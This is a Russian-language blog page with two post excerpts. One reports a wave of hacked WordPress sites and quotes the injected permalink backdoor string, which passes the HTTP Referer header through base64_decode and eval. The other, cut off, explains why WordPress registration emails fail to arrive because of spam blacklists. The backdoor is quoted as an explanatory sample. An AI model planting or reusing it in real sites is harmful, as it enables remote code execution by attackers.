Блог :: ЮБ

Намедни случилась большая паника среди wordpress-сообщества: злобные хакеры поломали кучу сайтов на Wordpress. Вскрытие показало, что в движке чуть ли не с рождения имеется большая дыра. Удивительно, что раньше никто на это не обратил внимания. Видимо, из-за отсутствия явно выраженных признаков взлома или не столь массового характера. Проявился взлом в виде “аппендиксов” у урлов примерно такого вида: /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Папа, что это было?

Часто, даже слишком часто, как на мой вкус, люди жалуются, что юзерам не доходят письма, остылаемые системой регистрации WordPress. В большинстве случаев это связано с тем, что с публичных хостингов часто рассылается спам, а потому хостнговые сервера - особенно бесплатные - нередкие участники спам-листов. (далее…)